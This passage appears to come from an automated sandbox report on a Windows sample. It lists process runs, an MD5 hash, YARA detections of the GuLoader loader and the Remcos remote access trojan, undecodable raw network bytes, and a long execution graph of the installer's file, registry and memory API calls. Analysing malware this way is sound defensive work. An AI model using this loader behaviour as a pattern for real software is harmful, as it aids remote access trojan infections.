                                            2025-01-08 14:08:33 UTC16384INData Raw: 72 3a af 26 62 4c 16 8d 97 2f db 08 04 92 87 02 eb 48 b2 ae 14 96 87 5b 69 ed a9 50 1e 74 14 59 a4 c5 39 dc 71 98 45 48 77 cc 4f d2 e9 b9 fb 14 e0 e7 a8 28 8e 3e 3f 24 11 bf 04 66 6f 38 23 5e 09 73 90 06 53 a1 35 81 b3 58 2e 14 93 11 73 1d c5 c9 bc f6 a6 12 05 7c f9 6b 01 c2 76 d7 2f 9f d2 37 d5 87 9a bb 00 c7 37 0b 36 76 a2 9a 3c f3 58 d5 b9 2e c6 86 cc 65 e0 2f 09 58 10 93 41 42 8b 34 0e a1 a8 4e 8a 14 cd f0 8c 4a f6 8e d2 40 0b 11 c1 ff bb c9 9f 03 75 2f bc 0e 91 40 e1 5f fd 08 81 02 41 71 ea 6a 47 0a fc 4d d2 62 96 27 f3 ef 6f 9c 21 ca c7 0f 88 68 07 66 a5 61 fd 3a c0 5b c9 df d1 4e ce 5b ec 09 68 70 c6 89 7c 19 6b 6d dd 4d 94 00 cb 0a 04 c0 6e 4d 2b c4 df 21 84 3f 0f 94 43 8b ec 52 3d 8d af 87 f2 e2 9e b3 97 18 90 07 3a 3d 78 e6 73 60 eb 47 2a 1b af
                                            Data Ascii: r:&bL/H[iPtY9qEHwO(>?$fo8#^sS5X.s|kv/776v<X.e/XAB4NJ@u/@_AqjGMb'o!hfa:[N[hp|kmMnM+!?CR=:=xs`G*


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:09:08:01
                                            Start date:08/01/2025
                                            Path:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\KO0q4biYfC.exe"
                                            Imagebase:0x400000
                                            File size:518'146 bytes
                                            MD5 hash:DD935B0E91E2E551B21296D8FA186D11
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1350132255.000000000560C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:8
                                            Start time:09:08:13
                                            Start date:08/01/2025
                                            Path:C:\Users\user\Desktop\KO0q4biYfC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\KO0q4biYfC.exe"
                                            Imagebase:0x400000
                                            File size:518'146 bytes
                                            MD5 hash:DD935B0E91E2E551B21296D8FA186D11
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:21%
                                              Dynamic/Decrypted Code Coverage:13.3%
                                              Signature Coverage:19.7%
                                              Total number of Nodes:1590
                                              Total number of Limit Nodes:36
                                              execution_graph 4151 401941 4152 401943 4151->4152 4157 402c41 4152->4157 4158 402c4d 4157->4158 4203 40640a 4158->4203 4161 401948 4163 405afa 4161->4163 4245 405dc5 4163->4245 4166 405b22 DeleteFileW 4168 401951 4166->4168 4167 405b39 4169 405c64 4167->4169 4259 4063e8 lstrcpynW 4167->4259 4169->4168 4288 40672b FindFirstFileW 4169->4288 4171 405b5f 4172 405b72 4171->4172 4173 405b65 lstrcatW 4171->4173 4260 405d09 lstrlenW 4172->4260 4176 405b78 4173->4176 4177 405b88 lstrcatW 4176->4177 4178 405b7e 4176->4178 4180 405b93 lstrlenW FindFirstFileW 4177->4180 4178->4177 4178->4180 4182 405c59 4180->4182 4194 405bb5 4180->4194 4181 405c82 4291 405cbd lstrlenW CharPrevW 4181->4291 4182->4169 4185 405c3c FindNextFileW 4189 405c52 FindClose 4185->4189 4185->4194 4186 405ab2 5 API calls 4188 405c94 4186->4188 4190 405c98 4188->4190 4191 405cae 4188->4191 4189->4182 4190->4168 4195 405450 24 API calls 4190->4195 4193 405450 24 API calls 4191->4193 4193->4168 4194->4185 4196 405afa 60 API calls 4194->4196 4198 405450 24 API calls 4194->4198 4264 4063e8 lstrcpynW 4194->4264 4265 405ab2 4194->4265 4273 405450 4194->4273 4284 4061ae MoveFileExW 4194->4284 4197 405ca5 4195->4197 4196->4194 4199 4061ae 36 API calls 4197->4199 4198->4185 4200 405cac 4199->4200 4200->4168 4218 406417 4203->4218 4204 406662 4205 402c6e 4204->4205 4236 4063e8 lstrcpynW 4204->4236 4205->4161 4220 40667c 4205->4220 4207 406630 lstrlenW 4207->4218 4208 40640a 10 API calls 4208->4207 4212 406545 GetSystemDirectoryW 4212->4218 4213 406558 GetWindowsDirectoryW 4213->4218 4214 40667c 5 API calls 4214->4218 4215 40640a 10 API calls 4215->4218 4216 4065d3 lstrcatW 4216->4218 4217 40658c SHGetSpecialFolderLocation 4217->4218 4219 4065a4 SHGetPathFromIDListW CoTaskMemFree 4217->4219 4218->4204 4218->4207 4218->4208 4218->4212 4218->4213 4218->4214 4218->4215 4218->4216 4218->4217 4229 4062b6 4218->4229 4234 40632f wsprintfW 4218->4234 4235 4063e8 lstrcpynW 4218->4235 4219->4218 4227 406689 4220->4227 4221 406704 CharPrevW 4223 4066ff 4221->4223 4222 4066f2 CharNextW 4222->4223 4222->4227 4223->4221 4224 406725 4223->4224 4224->4161 4226 4066de CharNextW 4226->4227 4227->4222 4227->4223 4227->4226 4228 4066ed CharNextW 4227->4228 4241 405cea 4227->4241 4228->4222 4237 406255 4229->4237 4232 40631a 4232->4218 4233 4062ea RegQueryValueExW RegCloseKey 4233->4232 4234->4218 4235->4218 4236->4205 4238 406264 4237->4238 4239 406268 4238->4239 4240 40626d RegOpenKeyExW 4238->4240 4239->4232 4239->4233 4240->4239 4242 405cf0 4241->4242 4243 405d06 4242->4243 4244 405cf7 CharNextW 4242->4244 4243->4227 4244->4242 4294 4063e8 lstrcpynW 4245->4294 4247 405dd6 4295 405d68 CharNextW CharNextW 4247->4295 4250 405b1a 4250->4166 4250->4167 4251 40667c 5 API calls 4257 405dec 4251->4257 4252 405e1d lstrlenW 4253 405e28 4252->4253 4252->4257 4254 405cbd 3 API calls 4253->4254 4256 405e2d GetFileAttributesW 4254->4256 4255 40672b 2 API calls 4255->4257 4256->4250 4257->4250 4257->4252 4257->4255 4258 405d09 2 API calls 4257->4258 4258->4252 4259->4171 4261 405d17 4260->4261 4262 405d29 4261->4262 4263 405d1d CharPrevW 4261->4263 4262->4176 4263->4261 4263->4262 4264->4194 4301 405eb9 GetFileAttributesW 4265->4301 4268 405adf 4268->4194 4269 405ad5 DeleteFileW 4271 405adb 4269->4271 4270 405acd RemoveDirectoryW 4270->4271 4271->4268 4272 405aeb SetFileAttributesW 4271->4272 4272->4268 4274 40546b 4273->4274 4283 40550d 4273->4283 4275 405487 lstrlenW 4274->4275 4276 40640a 17 API calls 4274->4276 4277 4054b0 4275->4277 4278 405495 lstrlenW 4275->4278 4276->4275 4280 4054c3 4277->4280 4281 4054b6 SetWindowTextW 4277->4281 4279 4054a7 lstrcatW 4278->4279 4278->4283 4279->4277 4282 4054c9 SendMessageW SendMessageW SendMessageW 4280->4282 4280->4283 4281->4280 4282->4283 4283->4194 4285 4061cf 4284->4285 4286 4061c2 4284->4286 4285->4194 4304 406034 4286->4304 4289 406741 FindClose 4288->4289 4290 405c7e 4288->4290 4289->4290 4290->4168 4290->4181 4292 405c88 4291->4292 4293 405cd9 lstrcatW 4291->4293 4292->4186 4293->4292 4294->4247 4296 405d85 4295->4296 4299 405d97 4295->4299 4298 405d92 CharNextW 4296->4298 4296->4299 4297 405dbb 4297->4250 4297->4251 4298->4297 4299->4297 4300 405cea CharNextW 4299->4300 4300->4299 4302 405abe 4301->4302 4303 405ecb SetFileAttributesW 4301->4303 4302->4268 4302->4269 4302->4270 4303->4302 4305 406064 4304->4305 4306 40608a GetShortPathNameW 4304->4306 4331 405ede GetFileAttributesW CreateFileW 4305->4331 4308 4061a9 4306->4308 4309 40609f 4306->4309 4308->4285 4309->4308 4311 4060a7 wsprintfA 4309->4311 4310 40606e CloseHandle GetShortPathNameW 4310->4308 4312 406082 4310->4312 4313 40640a 17 API calls 4311->4313 4312->4306 4312->4308 4314 4060cf 4313->4314 4332 405ede GetFileAttributesW CreateFileW 4314->4332 4316 4060dc 4316->4308 4317 4060eb GetFileSize GlobalAlloc 4316->4317 4318 4061a2 CloseHandle 4317->4318 4319 40610d 4317->4319 4318->4308 4333 405f61 ReadFile 4319->4333 4324 406140 4326 405e43 4 API calls 4324->4326 4325 40612c lstrcpyA 4327 40614e 4325->4327 4326->4327 4328 406185 SetFilePointer 4327->4328 4340 405f90 WriteFile 4328->4340 4331->4310 4332->4316 4334 405f7f 4333->4334 4334->4318 4335 405e43 lstrlenA 4334->4335 4336 405e84 lstrlenA 4335->4336 4337 405e8c 4336->4337 4338 405e5d lstrcmpiA 4336->4338 4337->4324 4337->4325 4338->4337 4339 405e7b CharNextA 4338->4339 4339->4336 4341 405fae GlobalFree 4340->4341 4341->4318 4342 4015c1 4343 402c41 17 API calls 4342->4343 4344 4015c8 4343->4344 4345 405d68 4 API calls 4344->4345 4355 4015d1 4345->4355 4346 401631 4348 401663 4346->4348 4349 401636 4346->4349 4347 405cea CharNextW 4347->4355 4352 401423 24 API calls 4348->4352 4369 401423 4349->4369 4358 40165b 4352->4358 4355->4346 4355->4347 4359 401617 GetFileAttributesW 4355->4359 4361 4059b9 4355->4361 4364 40591f CreateDirectoryW 4355->4364 4373 40599c CreateDirectoryW 4355->4373 4357 40164a SetCurrentDirectoryW 4357->4358 4359->4355 4376 4067c2 GetModuleHandleA 4361->4376 4365 405970 GetLastError 4364->4365 4366 40596c 4364->4366 4365->4366 4367 40597f SetFileSecurityW 4365->4367 4366->4355 4367->4366 4368 405995 GetLastError 4367->4368 4368->4366 4370 405450 24 API calls 4369->4370 4371 401431 4370->4371 4372 4063e8 lstrcpynW 4371->4372 4372->4357 4374 4059b0 GetLastError 4373->4374 4375 4059ac 4373->4375 4374->4375 4375->4355 4377 4067e8 GetProcAddress 4376->4377 4378 4067de 4376->4378 4381 4059c0 4377->4381 4382 406752 GetSystemDirectoryW 4378->4382 4380 4067e4 4380->4377 4380->4381 4381->4355 4383 406774 wsprintfW LoadLibraryExW 4382->4383 4383->4380 5248 4053c4 5249 4053d4 5248->5249 5250 4053e8 5248->5250 5251 405431 5249->5251 5252 4053da 5249->5252 5253 4053f0 IsWindowVisible 5250->5253 5259 405407 5250->5259 5254 405436 CallWindowProcW 5251->5254 5255 4043ab SendMessageW 5252->5255 5253->5251 5256 4053fd 5253->5256 5257 4053e4 5254->5257 5255->5257 5261 404d1a SendMessageW 5256->5261 5259->5254 5266 404d9a 5259->5266 5262 404d79 SendMessageW 5261->5262 5263 404d3d GetMessagePos ScreenToClient SendMessageW 5261->5263 5264 404d71 5262->5264 5263->5264 5265 404d76 5263->5265 5264->5259 5265->5262 5275 4063e8 lstrcpynW 5266->5275 5268 404dad 5276 40632f wsprintfW 5268->5276 5270 404db7 5271 40140b 2 API calls 5270->5271 5272 404dc0 5271->5272 5277 4063e8 lstrcpynW 5272->5277 5274 404dc7 5274->5251 5275->5268 5276->5270 5277->5274 4841 401e49 4842 402c1f 17 API calls 4841->4842 4843 401e4f 4842->4843 4844 402c1f 17 API calls 4843->4844 4845 401e5b 4844->4845 4846 401e72 EnableWindow 4845->4846 4847 401e67 ShowWindow 4845->4847 4848 402ac5 4846->4848 4847->4848 4849 40264a 4850 402c1f 17 API calls 4849->4850 4851 402659 4850->4851 4852 4026a3 ReadFile 4851->4852 4853 40273c 4851->4853 4854 405f61 ReadFile 4851->4854 4855 4026e3 MultiByteToWideChar 4851->4855 4856 402798 4851->4856 4859 402709 SetFilePointer MultiByteToWideChar 4851->4859 4860 4027a9 4851->4860 4862 402796 4851->4862 4852->4851 4852->4862 4853->4851 4853->4862 4863 405fbf SetFilePointer 4853->4863 4854->4851 4855->4851 4872 40632f wsprintfW 4856->4872 4859->4851 4861 4027ca SetFilePointer 4860->4861 4860->4862 4861->4862 4864 405fdb 4863->4864 4867 405ff3 4863->4867 4865 405f61 ReadFile 4864->4865 4866 405fe7 4865->4866 4866->4867 4868 406024 SetFilePointer 4866->4868 4869 405ffc SetFilePointer 4866->4869 4867->4853 4868->4867 4869->4868 4870 406007 4869->4870 4871 405f90 WriteFile 4870->4871 4871->4867 4872->4862 4873 4014cb 4874 405450 24 API calls 4873->4874 4875 4014d2 4874->4875 5278 4016cc 5279 402c41 17 API calls 5278->5279 5280 4016d2 GetFullPathNameW 5279->5280 5282 4016ec 5280->5282 5287 40170e 5280->5287 5281 401723 GetShortPathNameW 5283 402ac5 5281->5283 5284 40672b 2 API calls 5282->5284 5282->5287 5285 4016fe 5284->5285 5285->5287 5288 4063e8 lstrcpynW 5285->5288 5287->5281 5287->5283 5288->5287 5289 404dcc GetDlgItem GetDlgItem 5290 404e1e 7 API calls 5289->5290 5297 405037 5289->5297 5291 404ec1 DeleteObject 5290->5291 5292 404eb4 SendMessageW 5290->5292 5293 404eca 5291->5293 5292->5291 5294 404f01 5293->5294 5296 40640a 17 API calls 5293->5296 5298 40435f 18 API calls 5294->5298 5295 40511b 5299 4051c7 5295->5299 5304 40502a 5295->5304 5309 405174 SendMessageW 5295->5309 5300 404ee3 SendMessageW SendMessageW 5296->5300 5297->5295 5307 404d1a 5 API calls 5297->5307 5323 4050a8 5297->5323 5303 404f15 5298->5303 5301 4051d1 SendMessageW 5299->5301 5302 4051d9 5299->5302 5300->5293 5301->5302 5311 4051f2 5302->5311 5312 4051eb ImageList_Destroy 5302->5312 5319 405202 5302->5319 5308 40435f 18 API calls 5303->5308 5305 4043c6 8 API calls 5304->5305 5310 4053bd 5305->5310 5306 40510d SendMessageW 5306->5295 5307->5323 5324 404f23 5308->5324 5309->5304 5314 405189 SendMessageW 5309->5314 5315 4051fb GlobalFree 5311->5315 5311->5319 5312->5311 5313 405371 5313->5304 5320 405383 ShowWindow GetDlgItem ShowWindow 5313->5320 5317 40519c 5314->5317 5315->5319 5316 404ff8 GetWindowLongW SetWindowLongW 5318 405011 5316->5318 5325 4051ad SendMessageW 5317->5325 5321 405017 ShowWindow 5318->5321 5322 40502f 5318->5322 5319->5313 5330 404d9a 4 API calls 5319->5330 5336 40523d 5319->5336 5320->5304 5340 404394 SendMessageW 5321->5340 5341 404394 SendMessageW 5322->5341 5323->5295 5323->5306 5324->5316 5326 404ff2 5324->5326 5329 404f73 SendMessageW 5324->5329 5331 404fc0 SendMessageW 5324->5331 5332 404faf SendMessageW 5324->5332 5325->5299 5326->5316 5326->5318 5329->5324 5330->5336 5331->5324 5332->5324 5333 405347 InvalidateRect 5333->5313 5334 40535d 5333->5334 5342 404cd5 5334->5342 5335 40526b SendMessageW 5339 405281 5335->5339 5336->5335 5336->5339 5338 4052f5 SendMessageW SendMessageW 5338->5339 5339->5333 5339->5338 5340->5304 5341->5297 5345 404c0c 5342->5345 5344 404cea 5344->5313 5346 404c25 5345->5346 5347 40640a 17 API calls 5346->5347 5348 404c89 5347->5348 5349 40640a 17 API calls 5348->5349 5350 404c94 5349->5350 5351 40640a 17 API calls 5350->5351 5352 404caa lstrlenW wsprintfW SetDlgItemTextW 5351->5352 5352->5344 4886 40234e 4887 402c41 17 API calls 4886->4887 4888 40235d 4887->4888 4889 402c41 17 API calls 4888->4889 4890 402366 4889->4890 4891 402c41 17 API calls 4890->4891 4892 402370 GetPrivateProfileStringW 4891->4892 5353 4044cf lstrlenW 5354 4044f0 WideCharToMultiByte 5353->5354 5355 4044ee 5353->5355 5355->5354 5356 404850 5357 40487c 5356->5357 5358 40488d 5356->5358 5417 405a32 GetDlgItemTextW 5357->5417 5360 404899 GetDlgItem 5358->5360 5393 4048f8 5358->5393 5364 4048ad 5360->5364 5361 404887 5363 40667c 5 API calls 5361->5363 5362 4049dc 5365 404b8b 5362->5365 5419 405a32 GetDlgItemTextW 5362->5419 5363->5358 5367 4048c1 SetWindowTextW 5364->5367 5372 405d68 4 API calls 5364->5372 5371 4043c6 8 API calls 5365->5371 5370 40435f 18 API calls 5367->5370 5368 404a0c 5373 405dc5 18 API calls 5368->5373 5369 40640a 17 API calls 5374 40496c SHBrowseForFolderW 5369->5374 5375 4048dd 5370->5375 5376 404b9f 5371->5376 5377 4048b7 5372->5377 5378 404a12 5373->5378 5374->5362 5379 404984 CoTaskMemFree 5374->5379 5380 40435f 18 API calls 5375->5380 5377->5367 5381 405cbd 3 API calls 5377->5381 5420 4063e8 lstrcpynW 5378->5420 5382 405cbd 3 API calls 5379->5382 5383 4048eb 5380->5383 5381->5367 5384 404991 5382->5384 5418 404394 SendMessageW 5383->5418 5387 4049c8 SetDlgItemTextW 5384->5387 5392 40640a 17 API calls 5384->5392 5387->5362 5388 4048f1 5390 4067c2 5 API calls 5388->5390 5389 404a29 5391 4067c2 5 API calls 5389->5391 5390->5393 5400 404a30 5391->5400 5394 4049b0 lstrcmpiW 5392->5394 5393->5362 5393->5365 5393->5369 5394->5387 5397 4049c1 lstrcatW 5394->5397 5395 404a71 5421 4063e8 lstrcpynW 5395->5421 5397->5387 5398 404a78 5399 405d68 4 API calls 5398->5399 5401 404a7e GetDiskFreeSpaceW 5399->5401 5400->5395 5403 405d09 2 API calls 5400->5403 5405 404ac9 5400->5405 5404 404aa2 MulDiv 5401->5404 5401->5405 5403->5400 5404->5405 5406 404b3a 5405->5406 5407 404cd5 20 API calls 5405->5407 5408 404b5d 5406->5408 5409 40140b 2 API calls 5406->5409 5410 404b27 5407->5410 5422 404381 KiUserCallbackDispatcher 5408->5422 5409->5408 5412 404b3c SetDlgItemTextW 5410->5412 5413 404b2c 5410->5413 5412->5406 5415 404c0c 20 API calls 5413->5415 5414 404b79 5414->5365 5423 4047a9 5414->5423 5415->5406 5417->5361 5418->5388 5419->5368 5420->5389 5421->5398 5422->5414 5424 4047b7 5423->5424 5425 4047bc SendMessageW 5423->5425 5424->5425 5425->5365 5426 73c62c57 5427 73c62c6f 5426->5427 5428 73c6158f 2 API calls 5427->5428 5429 73c62c8a 5428->5429 5430 73c616d4 5431 73c61703 5430->5431 5432 73c61b5f 22 API calls 5431->5432 5433 73c6170a 5432->5433 5434 73c61711 5433->5434 5435 73c6171d 5433->5435 5436 73c61272 2 API calls 5434->5436 5437 73c61727 5435->5437 5438 73c61744 5435->5438 5441 73c6171b 5436->5441 5442 73c6153d 3 API calls 5437->5442 5439 73c6176e 5438->5439 5440 73c6174a 5438->5440 5444 73c6153d 3 API calls 5439->5444 5443 73c615b4 2 API calls 5440->5443 5445 73c6172c 5442->5445 5446 73c6174f 5443->5446 5444->5441 5447 73c615b4 2 API calls 5445->5447 5449 73c61272 2 API calls 5446->5449 5448 73c61732 5447->5448 5450 73c61272 2 API calls 5448->5450 5451 73c61755 GlobalFree 5449->5451 5452 73c61738 GlobalFree 5450->5452 5451->5441 5453 73c61769 GlobalFree 5451->5453 5452->5441 5453->5441 5454 401b53 5455 402c41 17 API calls 5454->5455 5456 401b5a 5455->5456 5457 402c1f 17 API calls 5456->5457 5458 401b63 wsprintfW 5457->5458 5459 402ac5 5458->5459 5460 401956 5461 402c41 17 API calls 5460->5461 5462 40195d lstrlenW 5461->5462 5463 402592 5462->5463 5471 4014d7 5472 402c1f 17 API calls 5471->5472 5473 4014dd Sleep 5472->5473 5475 402ac5 5473->5475 5476 401f58 5477 402c41 17 API calls 5476->5477 5478 401f5f 5477->5478 5479 40672b 2 API calls 5478->5479 5480 401f65 5479->5480 5482 401f76 5480->5482 5483 40632f wsprintfW 5480->5483 5483->5482 5484 402259 5485 402c41 17 API calls 5484->5485 5486 40225f 5485->5486 5487 402c41 17 API calls 5486->5487 5488 402268 5487->5488 5489 402c41 17 API calls 5488->5489 5490 402271 5489->5490 5491 40672b 2 API calls 5490->5491 5492 40227a 5491->5492 5493 40228b lstrlenW lstrlenW 5492->5493 5497 40227e 5492->5497 5494 405450 24 API calls 5493->5494 5496 4022c9 SHFileOperationW 5494->5496 5495 405450 24 API calls 5498 402286 5495->5498 5496->5497 5496->5498 5497->5495 5242 40175c 5243 402c41 17 API calls 5242->5243 5244 401763 5243->5244 5245 405f0d 2 API calls 5244->5245 5246 40176a 5245->5246 5247 405f0d 2 API calls 5246->5247 5247->5246 5499 401d5d GetDlgItem GetClientRect 5500 402c41 17 API calls 5499->5500 5501 401d8f LoadImageW SendMessageW 5500->5501 5502 402ac5 5501->5502 5503 401dad DeleteObject 5501->5503 5503->5502 5504 4022dd 5505 4022e4 5504->5505 5509 4022f7 5504->5509 5506 40640a 17 API calls 5505->5506 5507 4022f1 5506->5507 5508 405a4e MessageBoxIndirectW 5507->5508 5508->5509 5510 4028dd 5532 405ede GetFileAttributesW CreateFileW 5510->5532 5512 4028e4 5513 4028f0 GlobalAlloc 5512->5513 5514 402987 5512->5514 5515 402909 5513->5515 5516 40297e CloseHandle 5513->5516 5517 4029a2 5514->5517 5518 40298f DeleteFileW 5514->5518 5533 40345d SetFilePointer 5515->5533 5516->5514 5518->5517 5520 40290f 5521 403447 ReadFile 5520->5521 5522 402918 GlobalAlloc 5521->5522 5523 402928 5522->5523 5524 40295c 5522->5524 5526 4031d6 44 API calls 5523->5526 5525 405f90 WriteFile 5524->5525 5527 402968 GlobalFree 5525->5527 5531 402935 5526->5531 5528 4031d6 44 API calls 5527->5528 5530 40297b 5528->5530 5529 402953 GlobalFree 5529->5524 5530->5516 5531->5529 5532->5512 5533->5520 5534 73c61058 5537 73c61074 5534->5537 5535 73c610dd 5536 73c61092 5539 73c61516 GlobalFree 5536->5539 5537->5535 5537->5536 5547 73c61516 5537->5547 5540 73c610a2 5539->5540 5541 73c610b2 5540->5541 5542 73c610a9 GlobalSize 5540->5542 5543 73c610b6 GlobalAlloc 5541->5543 5544 73c610c7 5541->5544 5542->5541 5545 73c6153d 3 API calls 5543->5545 5546 73c610d2 GlobalFree 5544->5546 5545->5544 5546->5535 5549 73c6151c 5547->5549 5548 73c61522 5548->5536 5549->5548 5550 73c6152e GlobalFree 5549->5550 5550->5536 5551 73c618d9 5552 73c618fc 5551->5552 5553 73c61931 GlobalFree 5552->5553 5554 73c61943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5552->5554 5553->5554 5555 73c61272 2 API calls 5554->5555 5556 73c61ace GlobalFree GlobalFree 5555->5556 5557 401563 5558 402a6b 5557->5558 5561 40632f wsprintfW 5558->5561 5560 402a70 5561->5560 4405 4023e4 4406 402c41 17 API calls 4405->4406 4407 4023f6 4406->4407 4408 402c41 17 API calls 4407->4408 4409 402400 4408->4409 4422 402cd1 4409->4422 4412 402438 4420 402444 4412->4420 4426 402c1f 4412->4426 4413 40288b 4414 402c41 17 API calls 4416 40242e lstrlenW 4414->4416 4415 402463 RegSetValueExW 4419 402479 RegCloseKey 4415->4419 4416->4412 4419->4413 4420->4415 4429 4031d6 4420->4429 4423 402cec 4422->4423 4444 406283 4423->4444 4427 40640a 17 API calls 4426->4427 4428 402c34 4427->4428 4428->4420 4430 403201 4429->4430 4431 4031e5 SetFilePointer 4429->4431 4448 4032de GetTickCount 4430->4448 4431->4430 4434 405f61 ReadFile 4435 403221 4434->4435 4436 4032de 42 API calls 4435->4436 4443 40329e 4435->4443 4437 403238 4436->4437 4438 4032a4 ReadFile 4437->4438 4442 403247 4437->4442 4437->4443 4438->4443 4440 405f61 ReadFile 4440->4442 4441 405f90 WriteFile 4441->4442 4442->4440 4442->4441 4442->4443 4443->4415 4445 406292 4444->4445 4446 402410 4445->4446 4447 40629d RegCreateKeyExW 4445->4447 4446->4412 4446->4413 4446->4414 4447->4446 4449 403436 4448->4449 4450 40330c 4448->4450 4451 402e8e 32 API calls 4449->4451 4461 40345d SetFilePointer 4450->4461 4457 403208 4451->4457 4453 403317 SetFilePointer 4459 40333c 4453->4459 4457->4434 4457->4443 4458 405f90 WriteFile 4458->4459 4459->4457 4459->4458 4460 403417 SetFilePointer 4459->4460 4462 403447 4459->4462 4465 406943 4459->4465 4472 402e8e 4459->4472 4460->4449 4461->4453 4463 405f61 ReadFile 4462->4463 4464 40345a 4463->4464 4464->4459 4466 406968 4465->4466 4467 406970 4465->4467 4466->4459 4467->4466 4468 406a00 GlobalAlloc 4467->4468 4469 4069f7 GlobalFree 4467->4469 4470 406a77 GlobalAlloc 4467->4470 4471 406a6e GlobalFree 4467->4471 4468->4466 4468->4467 4469->4468 4470->4466 4470->4467 4471->4470 4473 402eb7 4472->4473 4474 402e9f 4472->4474 4477 402ec7 GetTickCount 4473->4477 4478 402ebf 4473->4478 4475 402ea8 DestroyWindow 4474->4475 4476 402eaf 4474->4476 4475->4476 4476->4459 4477->4476 4480 402ed5 4477->4480 4487 4067fe 4478->4487 4481 402f0a CreateDialogParamW ShowWindow 4480->4481 4482 402edd 4480->4482 4481->4476 4482->4476 4491 402e72 4482->4491 4484 402eeb wsprintfW 4485 405450 24 API calls 4484->4485 4486 402f08 4485->4486 4486->4476 4488 40681b PeekMessageW 4487->4488 4489 406811 DispatchMessageW 4488->4489 4490 40682b 4488->4490 4489->4488 4490->4476 4492 402e81 4491->4492 4493 402e83 MulDiv 4491->4493 4492->4493 4493->4484 5562 4071e5 5565 406976 5562->5565 5563 406a00 GlobalAlloc 5563->5565 5566 4072e1 5563->5566 5564 4069f7 GlobalFree 5564->5563 5565->5563 5565->5564 5565->5565 5565->5566 5567 406a77 GlobalAlloc 5565->5567 5568 406a6e GlobalFree 5565->5568 5567->5565 5567->5566 5568->5567 5569 73c610e1 5570 73c61111 5569->5570 5571 73c611d8 GlobalFree 5570->5571 5572 73c612ba 2 API calls 5570->5572 5573 73c611d3 5570->5573 5574 73c61272 2 API calls 5570->5574 5575 73c61164 GlobalAlloc 5570->5575 5576 73c611f8 GlobalFree 5570->5576 5577 73c611c4 GlobalFree 5570->5577 5578 73c612e1 lstrcpyW 5570->5578 5572->5570 5573->5571 5574->5577 5575->5570 5576->5570 5577->5570 5578->5570 5579 402868 5580 402c41 17 API calls 5579->5580 5581 40286f FindFirstFileW 5580->5581 5582 402897 5581->5582 5585 402882 5581->5585 5587 40632f wsprintfW 5582->5587 5584 4028a0 5588 4063e8 lstrcpynW 5584->5588 5587->5584 5588->5585 5589 401968 5590 402c1f 17 API calls 5589->5590 5591 40196f 5590->5591 5592 402c1f 17 API calls 5591->5592 5593 40197c 5592->5593 5594 402c41 17 API calls 5593->5594 5595 401993 lstrlenW 5594->5595 5596 4019a4 5595->5596 5597 4019e5 5596->5597 5601 4063e8 lstrcpynW 5596->5601 5599 4019d5 5599->5597 5600 4019da lstrlenW 5599->5600 5600->5597 5601->5599 5602 40166a 5603 402c41 17 API calls 5602->5603 5604 401670 5603->5604 5605 40672b 2 API calls 5604->5605 5606 401676 5605->5606 5607 73c6166d 5608 73c61516 GlobalFree 5607->5608 5610 73c61685 5608->5610 5609 73c616cb GlobalFree 5610->5609 5611 73c616a0 5610->5611 5612 73c616b7 VirtualFree 5610->5612 5611->5609 5612->5609 4927 40176f 4928 402c41 17 API calls 4927->4928 4929 401776 4928->4929 4930 401796 4929->4930 4931 40179e 4929->4931 4967 4063e8 lstrcpynW 4930->4967 4968 4063e8 lstrcpynW 4931->4968 4934 40179c 4938 40667c 5 API calls 4934->4938 4935 4017a9 4936 405cbd 3 API calls 4935->4936 4937 4017af lstrcatW 4936->4937 4937->4934 4949 4017bb 4938->4949 4939 4017f7 4941 405eb9 2 API calls 4939->4941 4940 40672b 2 API calls 4940->4949 4941->4949 4943 4017cd CompareFileTime 4943->4949 4944 40188d 4945 405450 24 API calls 4944->4945 4948 401897 4945->4948 4946 405450 24 API calls 4956 401879 4946->4956 4947 4063e8 lstrcpynW 4947->4949 4950 4031d6 44 API calls 4948->4950 4949->4939 4949->4940 4949->4943 4949->4944 4949->4947 4954 40640a 17 API calls 4949->4954 4963 405a4e MessageBoxIndirectW 4949->4963 4964 401864 4949->4964 4966 405ede GetFileAttributesW CreateFileW 4949->4966 4951 4018aa 4950->4951 4952 4018be SetFileTime 4951->4952 4953 4018d0 CloseHandle 4951->4953 4952->4953 4955 4018e1 4953->4955 4953->4956 4954->4949 4957 4018e6 4955->4957 4958 4018f9 4955->4958 4959 40640a 17 API calls 4957->4959 4960 40640a 17 API calls 4958->4960 4961 4018ee lstrcatW 4959->4961 4962 401901 4960->4962 4961->4962 4965 405a4e MessageBoxIndirectW 4962->4965 4963->4949 4964->4946 4964->4956 4965->4956 4966->4949 4967->4934 4968->4935 4969 4027ef 4970 4027f6 4969->4970 4972 402a70 4969->4972 4971 402c1f 17 API calls 4970->4971 4973 4027fd 4971->4973 4974 40280c SetFilePointer 4973->4974 4974->4972 4975 40281c 4974->4975 4977 40632f wsprintfW 4975->4977 4977->4972 5613 401a72 5614 402c1f 17 API calls 5613->5614 5615 401a7b 5614->5615 5616 402c1f 17 API calls 5615->5616 5617 401a20 5616->5617 5618 406af2 5619 406976 5618->5619 5620 4072e1 5619->5620 5621 406a00 GlobalAlloc 5619->5621 5622 4069f7 GlobalFree 5619->5622 5623 406a77 GlobalAlloc 5619->5623 5624 406a6e GlobalFree 5619->5624 5621->5619 5621->5620 5622->5621 5623->5619 5623->5620 5624->5623 5625 401573 5626 401583 ShowWindow 5625->5626 5627 